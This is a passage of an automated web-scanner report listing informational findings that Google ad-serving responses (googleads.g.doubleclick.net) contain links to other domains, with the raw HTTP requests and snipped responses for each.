<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Dell.com/Blades%26adT%3DSecure%2BServer%26adU%3Dwww.NetApp.com%26adT%3DNetApp%25C2%25AE%2BIT%2BCalculator%26adU%3Dwww.Microsoft.com/Cloud%26adT%3DWhat%2Bis%2BCloud%2BComputing%253F%26adU%3Dwww.coolcapitals.com%26adT%3DRestaurants%2BIn%2BAntwerp%26adU%3Dwww.ServerTech.com%26adT%3DServer%2BTechnology%2BInc%26gl%3DUS&amp;usg=AFQjCNGHtdDqg3WbvFpPtLbmGJyK6e6ikw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.356. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680649&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662649299&bpp=2&shv=r20110420&jsv=r20110415&correlator=1303662649303&frm=1&adk=2614322350&ga_vid=278906705.1303662649&ga_sid=1303662649&ga_hid=1493962260&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&eid=36815001&fu=4&ifi=1&dtd=6 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:30:46 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1393

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><iframe width="160" height="600" marginwidth="0" marginheight="0" scrolling="no" frameborder="0" src="http://cdn.w55c.net/i/0RW21p2fqU_270915107.html?rtbhost=rts-rr17.sldc.dataxu.net&btid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDZ8R0ZFcnBoektNWXwxMzAzNjYyNjQ4NDE3fDF8MEZjSUxxQkZUb3wwUlcyMXAyZnFVfDlRUXhjVE81dUgySWE3Qms0dkdTMlM5NnVmT0dzU0RDfDI1MjE4NQ&ei=GOOGLE_CONTENTNETWORK&wp_exchange=TbRQNgAFoToK7FcQpbsDBuQ7j9zay5ySEgzsXw&euid=Q0FFU0VPOGx5aWVNVWhXMXZzQlNlZE1IdGRn&slotid=MQ&fiu=MEZjSUxxQkZUbw&ciu=MFJXMjFwMmZxVQ&reqid=NERCNDUwMzYwMDA1QTEzQTBBRUM1NzEwQTVCQjAzMDY&ccw=SUFCMSMwLjB8SUFCOCMwLjB8SUFCMTQjMC4wOTA5NjI0OXxJQUIyMiMwLjMwMTAwNjA4&bp=252&zc=NzUyMDc&v=2&s=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php&"> </iframe>
...[SNIP]...

23.357. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303689654&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F24%2Fdork%2Freflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm&dt=1303671722296&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303671722313&frm=0&adk=1819763764&ga_vid=2086086425.1303671722&ga_sid=1303671722&ga_hid=977704896&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=1034&bih=907&eid=33895130&fu=0&ifi=1&dtd=43&xpc=WHZVxDmnwl&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 19:01:51 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 16905

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://xss.cx/2011/04/24/dork/reflected-xss-ghdb-cwe-79-capec-86-swisscomonlineshop.sso.bluewin.ch_80.htm%26hl%3Den%26client%3Dca-pub-4063878933780912%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BDatabase%2BServer%26adU%3Dgo.SunGardAS.com%26adT%3DManaged%2BData%2BCenter%26adU%3Dwww.Top10HostingList.com%26adT%3DBest%2B10%2BWeb%2BHosting%2BSites%26gl%3DUS&amp;usg=AFQjCNFY4ratvqYR2DzpI0tNdWZDydLjKw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.358. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303681917&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303663917219&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303663917228&frm=1&adk=2614322350&ga_vid=349261307.1303663917&ga_sid=1303663917&ga_hid=1646738243&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895298%2C33895130&fu=4&ifi=1&dtd=12 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:51:54 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 17244

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><script>(function(){function a(c){this.t={};this.tick=function(d,e,b){var f=b?b:(new Date).getTime
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.dell.com/business%26adT%3DDell%25E2%2584%25A2%2BWeb%2BServer%26adU%3Dwww.doubletake.visionsolutions.com%26adT%3DVirtualization%2BWhitepaper%26adU%3DInfocus.com/MSPRevenue%26adT%3DIncrease%2BMSP%2BRevenue%26adU%3Dtripplite.com/CoolingSolution%26adT%3DPortable%2BAC%2BUnit%26adU%3DPeru.travel%26adT%3DHotels%2B%2526amp%253B%2BResorts%2Bat%2BPeru%26gl%3DUS&amp;usg=AFQjCNGycu-R1AjeY6F796m6CZ520GW3Mg" target=_blank><script>
...[SNIP]...
</script><img alt="Ads by Google" border=0 height=16 onload=tick('abg','_abg') src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script onload=tick('smajs','_smajs') src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.359. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_a.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658383920&bpp=8&shv=r20110420&jsv=r20110415&correlator=1303658383931&frm=1&adk=2614322350&ga_vid=22955387.1303658384&ga_sid=1303658384&ga_hid=456012454&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=14 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:19:41 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1838

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=-yE2WDiJ9T_7ITZYOIn1PwAAAEAzMwdA-yE2WDiJ9T_7ITZYOIn1PyPD10Szk0Y9SsYda6b2ziWNP7RNAAAAAD8wAAC1AAAAlgIAAAIAAADGpAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sAQRABAgUCAAQAAAAAKSHOzQAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+9797%2C+1303658382%29%3Buf%28%27c%27%2C+52368%2C+1303658382%29%3Buf%28%27r%27%2C+173254%2C+1303658382%29%3Bppv%288991%2C+%274415378882846769955%27%2C+1303658382%2C+1303701582%2C+52368%2C+25553%29%3B&cnd=!rxFGFgiQmQMQxskKGAAg0ccBKEsx_5TyvDiJ9T9CCggAEAAYACABKAFCCwifRhAAGAAgAygBQgsIn0YQABgAIAIoAUgBUABYmxZgAGiWBQ..&referrer=http://pub.retailer-amazon.net/banner_120_600_a.php&pp=TbQ_jAAOTYYK5XFOGm5KNgYLJkB68AHlVgqkmA&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBw2WRjD-0TYabOc7ilQe2lLnTAdfq-NMBn6CU7BifxO3UHAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4oAHD8v3sA7IBF3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0ugEKMTYweDYwMF9hc8gBCdoBSWh0dHA6Ly9wdWIucmV0YWlsZXItYW1hem9uLm5ldC9iYW5uZXJfMTIwXzYwMF9hLnBocD9zZWFyY2g9JTdCJGtleXdvcmQlN0SYArgDwAIEyAKF0s8KqAMB6AO8AegDlAL1AwAAAMSABui3zqrBjrKG0QE%26num%3D1%26sig%3DAGiWqty_kivWyoJD_Hr1F2kWXBBBlx7Kqg%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.360. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303680030&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303662030618&bpp=3&shv=r20110420&jsv=r20110415&correlator=1303662030623&frm=1&adk=2614322350&ga_vid=795973224.1303662031&ga_sid=1303662031&ga_hid=1623587335&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=2540724997&fu=4&ifi=1&dtd=8 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:20:27 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 15008

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Cadillac.com/Escalade%26adT%3DMB%2BGL-Class%2Bvs%2BEscalade%26adU%3Darenasportsgrille.com%26adT%3DARENA%2BSports%2BBar%2B%2526amp%253B%2BGrill%26adU%3Dwww.GMC.com/Yukon%26adT%3DMB%2BGL450%2Bvs%2BGMC%2BYukon%26adU%3DAutoInsurance.Insure.com%26adT%3DMercedes%2BInsurance%2BRates%26adU%3DPeru.travel%26adT%3DWhen%2Bvisiting%2BPeru%26gl%3DUS&amp;usg=AFQjCNFSiFQUNVLoSRbrDsEgXxhHgkKXZw" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.361. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303679330&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keywa6d4b&dt=1303661330402&shv=r20110420&jsv=r20110415&saldr=1&correlator=1303661330403&frm=1&adk=2614322350&ga_vid=281280561.1303661330&ga_sid=1303661330&ga_hid=645132632&ga_fc=0&u_tz=-300&u_his=3&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=980&bih=907&ifk=4069653789&eid=33895130&fu=4&ifi=1&dtd=4 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://pub.retailer-amazon.net/banner_120_600_b.php?search={$keywa6d4b
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 16:08:47 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 14482

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd"><html><head><style>a:link,a:visited,a:hover,a:active{color:#0000ff;cursor:pointer;}body,table,div,ul,li{font-s
...[SNIP]...
</a>&nbsp;<img alt="" class=cbg height=10 src="http://pagead2.googlesyndication.com/pagead/badge/checkout_999999.gif" title="This site accepts Google Checkout" width=19><div class=adb>
...[SNIP]...
<div id=abgi><a href="http://www.google.com/url?ct=abg&amp;q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://pub.retailer-amazon.net/banner_120_600_b.php%253Fsearch%253D%25257B%2524keywa6d4b%26hl%3Den%26client%3Dca-pub-6888065668292638%26adU%3Dwww.Amazon.com%26adT%3DArnazon.com%25C2%25AE%2B-%2BShop%26adU%3DPeru.travel%26adT%3DAmazonia%2BMuseums%26adU%3Dwww.webgility.com%26adT%3DAmazon%2B-sync-%2BQuickBooks%26adU%3DAmazonRiverCruises.com%26adT%3DAmazon%2BRiver%2BCruises%26adU%3DECKOHousePublishing.com%26adT%3DSell%2BYour%2BBook%2Bon%2BAmazon%26gl%3DUS&amp;usg=AFQjCNHi5J9audPvRHO5qOI7JnInjAne6w" target=_blank><img alt="Ads by Google" border=0 height=16 src="http://pagead2.googlesyndication.com/pagead/abglogo/abg-en-100c-000000.png" width=78></a>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/sma8.js"></script>
...[SNIP]...

23.362. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /pagead/ads?client=ca-pub-6888065668292638&output=html&h=600&slotname=2465090616&w=160&lmt=1303676441&ea=0&flash=10.2.154&url=http%3A%2F%2Fpub.retailer-amazon.net%2Fbanner_120_600_b.php%3Fsearch%3D%7B%24keyword%7D&dt=1303658441795&bpp=4&shv=r20110420&jsv=r20110415&correlator=1303658441813&frm=1&adk=2614322350&ga_vid=596037721.1303658442&ga_sid=1303658442&ga_hid=931360055&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=-12245933&bih=-12245933&ifk=3901296887&fu=4&ifi=1&dtd=57 HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 15:20:39 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 1923

<html><head></head><body leftMargin="0" topMargin="0" marginwidth="0" marginheight="0"><script>var viewReq = new Array();function vu(u) {var i=new Image();i.src=u.replace("&amp;","&");viewReq.push(i);
...[SNIP]...
</script><script src="http://ib.adnxs.com/ab?enc=mpmZmZmZuT-amZmZmZm5PwAAAEAzMwdAmpmZmZmZuT-amZmZmZm5P8sfj1WxPNhXSsYda6b2ziXGP7RNAAAAAD8wAAC1AAAAbAEAAAIAAACAbAIA0WMAAAEAAABVU0QAVVNEAKAAWAIbC0sADQkBAgUCAAQAAAAAXiR2XAAAAAA.&tt_code=vert-188&udj=uf%28%27a%27%2C+8044%2C+1303658438%29%3Buf%28%27c%27%2C+43438%2C+1303658438%29%3Buf%28%27r%27%2C+158848%2C+1303658438%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3Bppv%288484%2C+%276329876008611553227%27%2C+1303658438%2C+1304263238%2C+43438%2C+25553%29%3B&cnd=!hBzzbAiu0wIQgNkJGAAg0ccBKEsxmpmZmZmZuT9CEwgAEAAYACABKP7__________wFCDgikQhCriLQJGBEgAygCQgsIpEIQABgAIAIoAkgDUABYmxZgAGjsAg..&referrer=http://pub.retailer-amazon.net/banner_120_600_b.php&pp=TbQ_xgANEQ4K5XtFLVwrw-XXrJe3yj-RN_KTDQ&pubclick=http://googleads.g.doubleclick.net/aclk%3Fsa%3Dl%26ai%3DBv9VRxj-0TY6iNMX2lQfD1_DqAsDG1PcB6LqfjxvwmZTrRAAQARgBIAA4AVCAx-HEBGDJ7oOI8KPsEoIBF2NhLXB1Yi02ODg4MDY1NjY4MjkyNjM4sgEXcHViLnJldGFpbGVyLWFtYXpvbi5uZXS6AQoxNjB4NjAwX2FzyAEJ2gFJaHR0cDovL3B1Yi5yZXRhaWxlci1hbWF6b24ubmV0L2Jhbm5lcl8xMjBfNjAwX2IucGhwP3NlYXJjaD0lN0Ika2V5d29yZCU3RJgCZMACBMgCqKikGagDAegDvAHoA5QC9QMAAADEgAaE3ZXQ39aT7_wB%26num%3D1%26sig%3DAGiWqtze_WOhtVbXb9r4MiVgqp5PRvdmxw%26client%3Dca-pub-6888065668292638%26adurl%3D"></script>
...[SNIP]...

23.363. http://googleads.g.doubleclick.net/pagead/ads  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /pagead/ads

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1303634521&flash=10.2.154&url=http%3A%2F%2Fxss.cx%2F2011%2F04%2F23%2Fdork%2Fnextadvisorcom%2Freflected-xss-directory-traversal-file-inclusion-dork-ghdb-example-poc-report.html&dt=1303616551239&bpp=4&shv=r20110414&jsv=r20110415&correlator=1303616551462&frm=0&adk=1607234649&ga_vid=1752949238.1303616552&ga_sid=1303616552&ga_hid=1192729809&ga_fc=0&u_tz=-300&u_his=9&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=16&u_nplug=9&u_nmime=44&biw=964&bih=891&fu=0&ifi=1&dtd=783&xpc=7zsW6P0jZh&p=http%3A//xss.cx HTTP/1.1
Host: googleads.g.doubleclick.net
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=22fba3001601008d||t=1303072660|et=730|cs=-8oc1u1u; __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Sun, 24 Apr 2011 03:42:30 GMT
Server: cafe
Cache-Control: private
X-XSS-Protection: 1; mode=block
Content-Length: 12552

